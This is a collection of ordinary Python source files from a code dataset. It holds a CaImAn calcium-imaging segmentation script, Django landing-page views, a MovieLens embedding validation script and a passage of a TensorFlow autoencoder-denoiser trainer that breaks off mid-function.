{"api_name": "paver.easy.info", "line_number": 36, "usage_type": "call"}, {"api_name": "paver.easy.options.develop", "line_number": 38, "usage_type": "attribute"}, {"api_name": "paver.easy.options", "line_number": 38, "usage_type": "name"}, {"api_name": "paver.easy.task", "line_number": 32, "usage_type": "name"}, {"api_name": "paver.easy.path", "line_number": 43, "usage_type": "call"}, {"api_name": "paver.easy.options.develop", "line_number": 43, "usage_type": "attribute"}, {"api_name": "paver.easy.options", "line_number": 43, "usage_type": "name"}, {"api_name": "paver.easy.call_task", "line_number": 45, "usage_type": "call"}, {"api_name": "paver.easy.info", "line_number": 46, "usage_type": "call"}, {"api_name": "paver.easy.sh", "line_number": 47, "usage_type": "call"}, {"api_name": "paver.easy.task", "line_number": 40, "usage_type": "name"}, {"api_name": "paver.easy.path", "line_number": 62, "usage_type": "call"}, {"api_name": "paver.easy.sh", "line_number": 70, "usage_type": "call"}, {"api_name": "paver.easy.sh", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "620380323", "text": "\"\"\"\nThis not a part of NeuroAnalysisTools\nrun it in an environment with caiman installed\nin command line\n\nfor example:\n>>> activate ciaman\n\"\"\"\n\nimport os\nimport glob\nimport numpy as np\nimport caiman as cm\nfrom caiman.source_extraction import cnmf as cnmf\nimport h5py\nfrom shutil import copyfile\n\n\"\"\"\nthe most relevant parameter is K.\nSmaller K gives less ROIs.\nBigger K gives more ROIs\n\"\"\"\n\ndef run():\n\n date_recorded = '200210'\n mouse_id = 'M504408'\n resolution = (512, 512)\n channel = 'green'\n data_folder_n = '110_LSVDGCUC_reorged'\n imaging_mode = '2p' # '2p' or 'deepscope'\n n_process = 4\n\n # ========================= caiman parameters for boutons ================================================\n # ============ sutter scope, zoom 4, 5 frames online average, 5 frames offline average ===================\n # fr = 2. 
# frame rate (Hz)\n # decay_time = 0.5 # approximate length of transient event in seconds\n gSig = (5, 5) # expected half size of neurons, (8, 8) for soma at zoom 2 on sutter scope\n p = 2 # order of AR indicator dynamics\n # min_SNR = 3 # minimum SNR for accepting new components\n # rval_thr = 0.80 # correlation threshold for new component inclusion\n # ds_factor = 1 # spatial downsampling factor (increases speed but may lose some fine structure)\n # gnb = 2 # number of background components\n # gSig = tuple(np.ceil(np.array(gSig) / ds_factor).astype('int')) # recompute gSig if downsampling is involved\n mot_corr = False # flag for online motion correction\n pw_rigid = False # flag for pw-rigid motion correction (slower but potentially more accurate)\n # max_shifts_online = np.ceil(10. / ds_factor).astype('int') # maximum allowed shift during motion correction\n # sniper_mode = True # flag using a CNN to detect new neurons (o/w space correlation is used)\n # init_batch = 200 # number of frames for initialization (presumably from the first file)\n expected_comps = 500 # maximum number of expected components used for memory pre-allocation (exaggerate here)\n # dist_shape_update = True # flag for updating shapes in a distributed way\n # min_num_trial = 10 # number of candidate components per frame\n K = 10 # initial number of components\n # epochs = 2 # number of passes over the data\n show_movie = False # show the movie with the results as the data gets processed\n\n method_init = 'sparse_nmf'\n do_merge = False\n ssub = 1\n tsub = 1\n alpha_snmf = 10e1\n rolling_sum = False\n rf = 256\n p_ssub = 1\n p_tsub = 1\n # Ain = None\n # method_deconvolution = 'oasis'\n border_pix = 0\n # ========================= caiman parameters for boutons ================================================\n\n\n curr_folder = os.path.dirname(os.path.realpath(__file__))\n\n c, dview, n_processes = cm.cluster.setup_cluster(backend='local', n_processes=n_process, single_thread=False)\n\n data_folder = r\"\\\\allen\\programs\\braintv\\workgroups\\nc-ophys\\Jun\\raw_data\\{}-{}-{}\" \\\n r\"\\{}\".format(date_recorded, mouse_id, imaging_mode, data_folder_n)\n\n\n plane_ns = [f for f in os.listdir(data_folder) if\n os.path.isdir(os.path.join(data_folder, f)) and\n f[:5] == 'plane']\n plane_ns.sort()\n print('planes:')\n print('\\n'.join(plane_ns))\n\n for plane_n in plane_ns:\n\n print('\\nsegmenting plane: {}'.format(plane_n))\n\n plane_folder = os.path.join(data_folder, plane_n, channel, 'corrected')\n os.chdir(plane_folder)\n\n fn = [f for f in os.listdir(plane_folder) if len(f) > 16 and f[-5:] == '.mmap']\n if len(fn) > 1:\n print('\\n'.join(fn))\n raise LookupError('more than one file found.')\n elif len(fn) == 0:\n raise LookupError('no file found.')\n else:\n fn = fn[0]\n\n fp = os.path.join(os.path.realpath(plane_folder), fn)\n\n params_dict = {'fnames': [fp],\n # 'fr': fr,\n # 'decay_time': decay_time,\n 'gSig': gSig,\n 'p': p,\n # 'min_SNR': min_SNR,\n # 'rval_thr': rval_thr,\n # 'ds_factor': ds_factor,\n # 'nb': gnb,\n 'motion_correct': mot_corr,\n # 'init_batch': init_batch,\n # 'init_method': 'bare',\n # 'normalize': True,\n 'expected_comps': expected_comps,\n # 'sniper_mode': sniper_mode,\n # 'dist_shape_update': dist_shape_update,\n # 'min_num_trial': min_num_trial,\n 'K': K,\n # 'epochs': epochs,\n # 'max_shifts_online': max_shifts_online,\n 'pw_rigid': pw_rigid,\n 'show_movie': show_movie,\n\n # testing parameters\n 'method_init': method_init,\n 'do_merge': do_merge,\n 'ssub': ssub,\n 'tsub': tsub,\n 
'alpha_snmf': alpha_snmf,\n 'rolling_sum': rolling_sum,\n 'rf': rf,\n 'p_ssub': p_ssub,\n 'p_tsub': p_tsub,\n # 'Ain': Ain,\n # 'method_deconvolution': method_deconvolution,\n 'border_pix': border_pix\n }\n\n opts = cnmf.params.CNMFParams(params_dict=params_dict)\n\n cnm1 = cnmf.CNMF(n_process, params=opts, dview=dview)\n cnm1.fit_file(motion_correct=False)\n\n roi_num = cnm1.estimates.A.shape[1]\n print('saving ...')\n save_f = h5py.File('caiman_segmentation_results.hdf5', 'w')\n save_f.create_dataset('masks',\n data=np.array(cnm1.estimates.A.todense()).T.reshape((roi_num, resolution[0], resolution[1]),\n order='F'), compression='lzf')\n save_f.create_dataset('traces', data=cnm1.estimates.C)\n save_f.close()\n\n copyfile(os.path.join(plane_folder, 'caiman_segmentation_results.hdf5'),\n os.path.join(curr_folder, plane_n, 'caiman_segmentation_results.hdf5'))\n\n # %% STOP CLUSTER and clean up log files\n cm.stop_server(dview=dview)\n log_files = glob.glob('*_LOG_*')\n for log_file in log_files:\n os.remove(log_file)\n\n\nif __name__ == '__main__':\n run()\n\n", "sub_path": "NeuroAnalysisTools/scripts/analysis_pipeline_movie/old/caiman_segmentation_bouton_mmap.py", "file_name": "caiman_segmentation_bouton_mmap.py", "file_ext": "py", "file_size_in_byte": 6389, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.dirname", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 72, "usage_type": "call"}, {"api_name": "caiman.cluster.setup_cluster", "line_number": 74, "usage_type": "call"}, {"api_name": "caiman.cluster", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 92, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 103, "usage_type": "call"}, {"api_name": "caiman.source_extraction.cnmf.params.CNMFParams", "line_number": 143, "usage_type": "call"}, {"api_name": "caiman.source_extraction.cnmf.params", "line_number": 143, "usage_type": "attribute"}, {"api_name": "caiman.source_extraction.cnmf", "line_number": 143, "usage_type": "name"}, {"api_name": "caiman.source_extraction.cnmf.CNMF", "line_number": 145, "usage_type": "call"}, {"api_name": "caiman.source_extraction.cnmf", "line_number": 145, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": 
"caiman.stop_server", "line_number": 161, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 162, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "562859722", "text": "# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.contrib import messages\nfrom .models import Informer\nfrom landing.cc_forms import SocialForm, EmailCollectForm\n\n# Create your views here.\nipg_slider_list = (\"Смех до слез!\",\n \"Повод собраться с друзьями!\",\n \"Рабы которые создают игры для тебя!\",\n \"Гарантия отличного вечера!\",\n \"Органы по отличной цене!\",\n \"Театр абсурда у тебя дома!\",\n \"Черный юмор в самом соку!\",\n \"Вечные поиски логотипа!\",\n )\nipg_navbar = ((\"Главная\", \"main_page\"),\n \"Игры\",\n (\"Партнеры\", \"partners_list\"),\n (\"Связь\", \"games-contact\")\n )\n\n\ndef info_view(request):\n # Responds for main game lister\n queryset = Informer.objects.all()\n # email forms\n email_collect_form = EmailCollectForm(request.POST or None)\n if request.method == 'POST':\n if email_collect_form.is_valid():\n instance = email_collect_form.save(commit=False)\n instance.save()\n messages.success(request, 'Спасибо!')\n return HttpResponseRedirect('/')\n else:\n email_collect_form = EmailCollectForm()\n\n context = {'obj_list': queryset,\n 'email_form': email_collect_form,\n 'title': 'Main',\n 'ipg_navbar': ipg_navbar,\n 'ipg_slider_list': ipg_slider_list,\n }\n return render(request, 'basetwo.html', context)\n\n\ndef games_contact_form(request):\n # here for header game list\n queryset = Informer.objects.all()\n # social form\n social_form = SocialForm(request.POST or None)\n if request.method == 'POST':\n if social_form.is_valid():\n instance = social_form.save(commit=False)\n instance.save()\n messages.success(request, 'Сообщение отправлено!')\n return HttpResponseRedirect('/contact/')\n else:\n social_form = SocialForm()\n\n context = {'social_form': social_form,\n 'obj_list': queryset,\n 'ipg_navbar': ipg_navbar,\n 'ipg_slider_list': ipg_slider_list,\n }\n return render(request, 'contact.html', context)\n\n", "sub_path": "landing/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2546, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "models.Informer.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Informer.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.Informer", "line_number": 27, "usage_type": "name"}, {"api_name": "landing.cc_forms.EmailCollectForm", "line_number": 29, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 34, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 34, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 35, "usage_type": "call"}, {"api_name": "landing.cc_forms.EmailCollectForm", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Informer.objects.all", "line_number": 50, "usage_type": "call"}, {"api_name": "models.Informer.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "models.Informer", "line_number": 50, "usage_type": "name"}, {"api_name": "landing.cc_forms.SocialForm", "line_number": 52, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", 
"line_number": 57, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 57, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 58, "usage_type": "call"}, {"api_name": "landing.cc_forms.SocialForm", "line_number": 60, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "362573624", "text": "#!/bin/env python3 -u\n\n#\n# Tests results of regression from t9a.py\n# andre@corp.insite.com.br - 2017-11-06\n#\n# parameters: t9c.py \n#\n\nimport pandas as pd\nimport numpy as np\nimport argparse\nimport os\nimport time\nimport math\nimport sys\n\nparser = argparse.ArgumentParser(description='Test results of movielens regression.')\nparser.add_argument('logdir', nargs=1, help='directory with data from the tensorflow run')\nparser.add_argument('--ratings', nargs=1, help='file containing ratings to be tested', required = True)\nparser.add_argument('--movies', nargs=1, help='file containing movie info', required = True)\nparser.add_argument('--csvout', nargs=1, help='output file with test results', required = True)\n\n\nargs = parser.parse_args()\nlogdir = args.logdir[0]\nprint(\"Directory: {}\".format(logdir))\n\nsys.stdout = open(logdir + \"/validation.out\", \"w\", 1)\nsys.stderr = sys.stdout\n\nratfile = args.ratings[0]\nprint(\"Ratings File: {}\".format(ratfile))\ncsvout = args.csvout[0]\nprint(\"Output CSV file: {}\".format(csvout))\nmovies_file = args.movies[0]\nprint(\"Movies file: {}\".format(movies_file))\n\n\nif \"linear\" in logdir:\n print(\"Linear activation\")\n t_regression = \"linear\"\nelif \"asigmoid\" in logdir:\n print(\"sigmoid activation\")\n t_regression = \"sigmoid\"\nelse:\n print(\"Hmmm. directory doesn't have a recognized type of regression (sigmoid or linear)\")\n sys.exit(1)\n\nif not os.path.exists(logdir):\n print(\"Diretory doesn't exist\")\n sys.exit(2)\n\nif not os.path.isdir(logdir):\n print(\"{} is not a directory\".format(logdir))\n sys.exit(3)\n\nif not os.path.exists(ratfile):\n print(\"{} does not exist\")\n sys.exit(4)\n\n\nt0 = time.perf_counter()\ndef loga(msg):\n now = time.perf_counter()\n print(\"%6.2f: %s\" % (now - t0, msg))\n\nmemb = pd.read_csv(logdir + \"/movie_embeddings.csv.gz\", header = None)\nloga(\"Movie embeddings: {}\".format(memb.shape))\nuemb = pd.read_csv(logdir + \"/user_embeddings.csv.gz\", header = None)\nloga(\"User embeddings: {}\".format(uemb.shape))\nubias = pd.read_csv(logdir + \"/user_bias.csv.gz\", header=None)\nloga(\"User Bias: {}\".format(ubias.shape))\nmbias = pd.read_csv(logdir + \"/movie_bias.csv.gz\", header=None)\nloga(\"Movie Bias: {}\".format(mbias.shape))\nmovies = pd.read_csv(movies_file)\nloga(\"Movies: {}\".format(movies.shape))\n\nloga(\"Loading ratings...\")\nratings = pd.read_csv(ratfile)\nloga(\"Ratings: {}\".format(ratings.shape))\nuserIds = np.sort(ratings['userId'].unique())\nloga(\"Unique users: {}\".format(userIds.shape))\ncsvfname = logdir + \"/\" + csvout\nprint(\"opening csv output file: {}\".format(csvfname))\noutf=open(csvfname, \"w\", buffering = 1)\n\nnum_features = uemb.shape[1]\nmean_ratings = movies['mean_ratings']\n\nprint('\"context\",\"num_movies\",\"mean_error\",\"mse\"', file=outf)\n#loga(\"{0},{1},{2:.3f},{3:.3f}\".format(i, num_movies, \n# (np.sum(validation_predicted_score) - np.sum(validation_actual_score))/num_movies, \n# np.sum(np.square(validation_predicted_score - validation_actual_score))/num_movies), file=outf)\nfor userId in userIds:\n loga(\"==== userId: 
{}\".format(userId))\n user_ratings = ratings.loc[ratings['userId'] == userId]\n user_movieIds = user_ratings['movieId'].values\n predicted_ratings = movies.loc[user_movieIds,]['mean_ratings'].values\n actual_ratings = user_ratings['rating'].values\n diff = actual_ratings - predicted_ratings\n print(\"diffs: {}\".format(diff))\n\n old_user_vector = None\n #np.random.shuffle(user_ratings)\n\n validation_movieIds = user_ratings['movieId'].values\n num_movies = validation_movieIds.shape[0]\n print(\"{0},{1},{2:.3f},{3:.3f}\".format(0, num_movies, \n np.mean(diff),\n np.mean(np.square(diff))), file=outf)\n\n for i in range(1, user_ratings.shape[0]):\n seen_movieIds = user_ratings[0:i]['movieId'].values\n validation_movieIds = user_ratings[i:]['movieId'].values\n # NUM_FEATURES x n\n #seen_actual_score = user_ratings[0:i]['rating'].values\n seen_actual_score = np.matrix(user_ratings[0:i]['rating']).T\n # TODO: precisa testar isto...\n seen_memb = memb.loc[seen_movieIds,] # (n, NUM_FEATURES)\n # loga(\"seen_movie embeddings: {}\".format(seen_memb))\n seen_movie_bias = mbias.loc[seen_movieIds].values\n #loga(\"DEBUG: seen_movie_bias: {} ({})\".format(seen_movie_bias, seen_movie_bias.shape))\n inversora = np.linalg.pinv(seen_memb)\n # loga(\"DEBUG: inverter matrix: {}\".format(inversora))\n score_offset = seen_actual_score - seen_movie_bias\n # loga(\"DEBUG: score offset: [{}] ({})\".format(score_offset.T, score_offset.shape))\n\n user_vector = np.matmul(inversora, score_offset)\n seen_user_bias = (score_offset - np.matmul(seen_memb, user_vector)).mean()\n if i == 1:\n rotation = 0\n else:\n loga(\"user_vector shapes: {} and {}\".format(old_user_vector.shape, user_vector.shape))\n rotation = np.matmul(np.transpose(old_user_vector), user_vector)/np.linalg.norm(old_user_vector)/np.linalg.norm(user_vector)\n if num_features > 1:\n try:\n loga(\" change in user vector: {}: {}: norm: {} to {}\".format(rotation, math.acos(rotation)*180/math.pi, np.linalg.norm(old_user_vector), np.linalg.norm(user_vector)))\n except:\n loga(\"Unexpected error:\", sys.exc_info()[0])\n loga(\"{0:f} {1} {2}\".format(rotation, old_user_vector, user_vector))\n\n old_user_vector = user_vector\n \n loga(\"User vector: {} ({}) [{}]\".format(user_vector.T, user_vector.shape, np.linalg.norm(user_vector)))\n #loga(\"DEBUG: shapes: {}, {}\".format(np.matmul(seen_memb, user_vector).shape, seen_movie_bias.shape))\n #loga(\"DEBUG: {}, {}\".format(np.matmul(seen_memb, user_vector), seen_movie_bias))\n seen_predicted_score = np.add(np.matmul(seen_memb, user_vector), seen_movie_bias)\n seen_predicted_score = np.minimum(np.maximum(0.5, seen_predicted_score + seen_user_bias), 5.0)\n loga(\" user bias: {}\".format(seen_user_bias))\n #loga(\" predicted score: {}\".format(predicted_score))\n #loga(\" actual scores: {}\".format(seen_actual_score))\n loga(\" fixed: context: {0} mse: {2:.3f}\".format(i, (np.sum(seen_predicted_score) - np.sum(seen_actual_score))/i, np.sum(np.square(seen_predicted_score - seen_actual_score))/i))\n \n validation_memb = memb.loc[validation_movieIds,].values\n validation_movie_bias = mbias.loc[validation_movieIds].values\n validation_predicted_score = np.minimum(5.0,np.maximum(0.5,np.add(np.add(np.matmul(validation_memb, user_vector), validation_movie_bias), seen_user_bias)))\n validation_actual_score = np.matrix(user_ratings[i:]['rating']).T\n loga(\" predicted: {} {}[t]\".format(validation_predicted_score.shape, np.transpose(validation_predicted_score)))\n loga(\" actual: {} 
{}[t]\".format(validation_actual_score.shape, validation_actual_score.T))\n validation_error = validation_actual_score - validation_predicted_score\n loga(\" error: {} {}\".format(validation_error.shape, validation_error.T))\n num_movies = validation_movieIds.shape[0]\n loga(\" context: {0} num elements: {1} avg error: {2:.3f} mse: {3:.3f}\".format(i, num_movies, \n (np.sum(validation_predicted_score) - np.sum(validation_actual_score))/num_movies, \n np.sum(np.square(validation_predicted_score - validation_actual_score))/num_movies))\n print(\"{0},{1},{2:.3f},{3:.3f}\".format(i, num_movies, \n (np.sum(validation_predicted_score) - np.sum(validation_actual_score))/num_movies, \n np.sum(np.square(validation_predicted_score - validation_actual_score))/num_movies), file=outf)\n loga(\"---\")\n \n\n", "sub_path": "t9c.py", "file_name": "t9c.py", "file_ext": "py", "file_size_in_byte": 7456, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 60, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 63, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 76, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 135, "usage_type": 
"attribute"}, {"api_name": "math.acos", "line_number": 138, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 138, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 138, "usage_type": "attribute"}, {"api_name": "sys.exc_info", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 145, "usage_type": "attribute"}, {"api_name": "numpy.add", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 169, "usage_type": "call"}]} +{"seq_id": "358276651", "text": "from base.base_train_multi import BaseTrainMulti\nfrom tqdm import tqdm\nimport numpy as np\nfrom time import sleep\nfrom time import time\nfrom utils.evaluations import save_results\n\n\nclass AutoencoderDenoiserTrainer(BaseTrainMulti):\n\n\n def __init__(self, sess, model, data, config, logger):\n super(AutoencoderDenoiserTrainer, self).__init__(sess, model, data, config, logger)\n self.batch_size = self.config.data_loader.batch_size\n self.noise_dim = self.config.trainer.noise_dim\n self.img_dims = self.config.trainer.image_dims\n # Inititalize the train Dataset Iterator\n self.sess.run(self.data.iterator.initializer)\n # Initialize the test Dataset Iterator\n self.sess.run(self.data.test_iterator.initializer)\n if self.config.data_loader.validation:\n self.sess.run(self.data.valid_iterator.initializer)\n self.best_valid_loss = 0\n self.nb_without_improvements = 0\n\n def train_epoch_ae(self):\n # Attach the epoch loop to a variable\n begin = time()\n # Make the loop of the epoch iterations\n loop = tqdm(range(self.config.data_loader.num_iter_per_epoch))\n ae_losses = []\n summaries = []\n image = self.data.image\n cur_epoch = self.model.cur_epoch_tensor.eval(self.sess)\n for _ in loop:\n loop.set_description(\"Epoch:{}\".format(cur_epoch + 1))\n loop.refresh() # to show immediately the update\n sleep(0.01)\n ae, sum_ae = self.train_step_ae(image, cur_epoch)\n ae_losses.append(ae)\n summaries.append(sum_ae)\n self.logger.info(\"Epoch {} terminated\".format(cur_epoch))\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=summaries)\n # Check for reconstruction\n if cur_epoch % self.config.log.frequency_test == 0:\n image_eval = self.sess.run(image)\n feed_dict = 
{self.model.image_input: image_eval, self.model.is_training_ae: False}\n reconstruction = self.sess.run(self.model.summary_op_ae, feed_dict=feed_dict)\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=[reconstruction])\n ae_m = np.mean(ae_losses)\n self.logger.info(\n \"Epoch: {} | time = {} s | loss AE= {:4f} \".format(\n cur_epoch, time() - begin, ae_m\n )\n )\n self.model.save(self.sess)\n\n def train_epoch_den(self):\n # Attach the epoch loop to a variable\n begin = time()\n # Make the loop of the epoch iterations\n loop = tqdm(range(self.config.data_loader.num_iter_per_epoch))\n den_losses = []\n summaries = []\n image = self.data.image\n cur_epoch = self.model.cur_epoch_tensor.eval(self.sess)\n for _ in loop:\n loop.set_description(\"Epoch:{}\".format(cur_epoch + 1))\n loop.refresh() # to show immediately the update\n sleep(0.01)\n den, sum_den = self.train_step_den(image, cur_epoch)\n den_losses.append(den)\n summaries.append(sum_den)\n self.logger.info(\"Epoch {} terminated\".format(cur_epoch))\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=summaries, summarizer=\"train_den\")\n # Check for reconstruction\n if cur_epoch % self.config.log.frequency_test == 0:\n image_eval = self.sess.run(image)\n noise = np.zeros_like(image_eval)\n feed_dict = {self.model.image_input: image_eval,self.model.noise_tensor: noise, self.model.is_training_ae: False}\n reconstruction = self.sess.run(self.model.summary_op_den, feed_dict=feed_dict)\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=[reconstruction], summarizer=\"train_den\")\n den_m = np.mean(den_losses)\n self.logger.info(\n \"Epoch: {} | time = {} s | loss DEN= {:4f} \".format(\n cur_epoch, time() - begin, den_m\n )\n )\n self.model.save(self.sess)\n\n def train_step_ae(self, image, cur_epoch):\n image_eval = self.sess.run(image)\n feed_dict = {\n self.model.image_input: image_eval,\n self.model.is_training_ae: True,\n }\n # Train Autoencoder\n _, lae, sm_ae = self.sess.run(\n [self.model.train_auto_op, self.model.auto_loss, self.model.summary_op_loss_ae],\n feed_dict=feed_dict,\n )\n return lae, sm_ae\n\n\n def train_step_den(self, image, cur_epoch):\n noise = np.random.normal(\n loc=0.0,\n scale=1.0,\n size=[self.config.data_loader.batch_size] + self.config.trainer.image_dims,\n )\n image_eval = self.sess.run(image)\n feed_dict = {\n self.model.image_input: image_eval,\n self.model.noise_tensor: noise,\n self.model.is_training_ae: False,\n }\n # Train Denoiser\n _, lden, sm_den = self.sess.run(\n [self.model.train_den_op, self.model.den_loss, self.model.summary_op_loss_den],\n feed_dict=feed_dict,\n )\n return lden, sm_den\n\n def test_epoch(self):\n self.logger.warn(\"Testing evaluation...\")\n scores_rec = []\n scores_den = []\n scores_pipe = []\n scores_pipe_2 = []\n scores_mask1 = []\n scores_mask2 = []\n scores_mask1_s = []\n scores_mask2_s = []\n summaries = []\n inference_time = []\n true_labels = []\n # Create the scores\n test_loop = tqdm(range(self.config.data_loader.num_iter_per_test))\n cur_epoch = self.model.cur_epoch_tensor.eval(self.sess)\n for _ in test_loop:\n test_batch_begin = time()\n test_batch, test_labels, ground_truth = self.sess.run([self.data.test_image, self.data.test_label, self.data.ground_truth])\n test_loop.refresh() # to show immediately the update\n sleep(0.01)\n feed_dict = {self.model.image_input: test_batch, self.model.ground_truth: ground_truth, self.model.is_training_ae: False}\n scores_rec += self.sess.run(self.model.rec_score, feed_dict=feed_dict).tolist()\n 
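# NOTE: each score below is fetched with its own sess.run(...) on the same feed_dict; grouping them into a single sess.run([...]) call would avoid recomputing the forward pass for every metric.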
scores_den += self.sess.run(self.model.den_score, feed_dict=feed_dict).tolist()\n scores_pipe += self.sess.run(self.model.pipe_score, feed_dict=feed_dict).tolist()\n scores_pipe_2 += self.sess.run(self.model.pipe_score_2, feed_dict=feed_dict).tolist()\n scores_mask1 += self.sess.run(self.model.mask_score_1, feed_dict=feed_dict).tolist()\n scores_mask2 += self.sess.run(self.model.mask_score_2, feed_dict=feed_dict).tolist()\n scores_mask1_s += self.sess.run(self.model.mask_score_1_s, feed_dict=feed_dict).tolist()\n scores_mask2_s += self.sess.run(self.model.mask_score_2_s, feed_dict=feed_dict).tolist()\n summaries +=self.sess.run([self.model.summary_op_test],feed_dict=feed_dict)\n inference_time.append(time() - test_batch_begin)\n true_labels += test_labels.tolist()\n self.summarizer.add_tensorboard(step=cur_epoch, summaries=summaries,summarizer=\"test\")\n true_labels = np.asarray(true_labels)\n inference_time = np.mean(inference_time)\n self.logger.info(\"Testing: Mean inference time is {:4f}\".format(inference_time))\n scores_rec = np.asarray(scores_rec)\n scores_den = np.asarray(scores_den)\n scores_pipe = np.asarray(scores_pipe)\n scores_pipe_2 = np.asarray(scores_pipe_2)\n 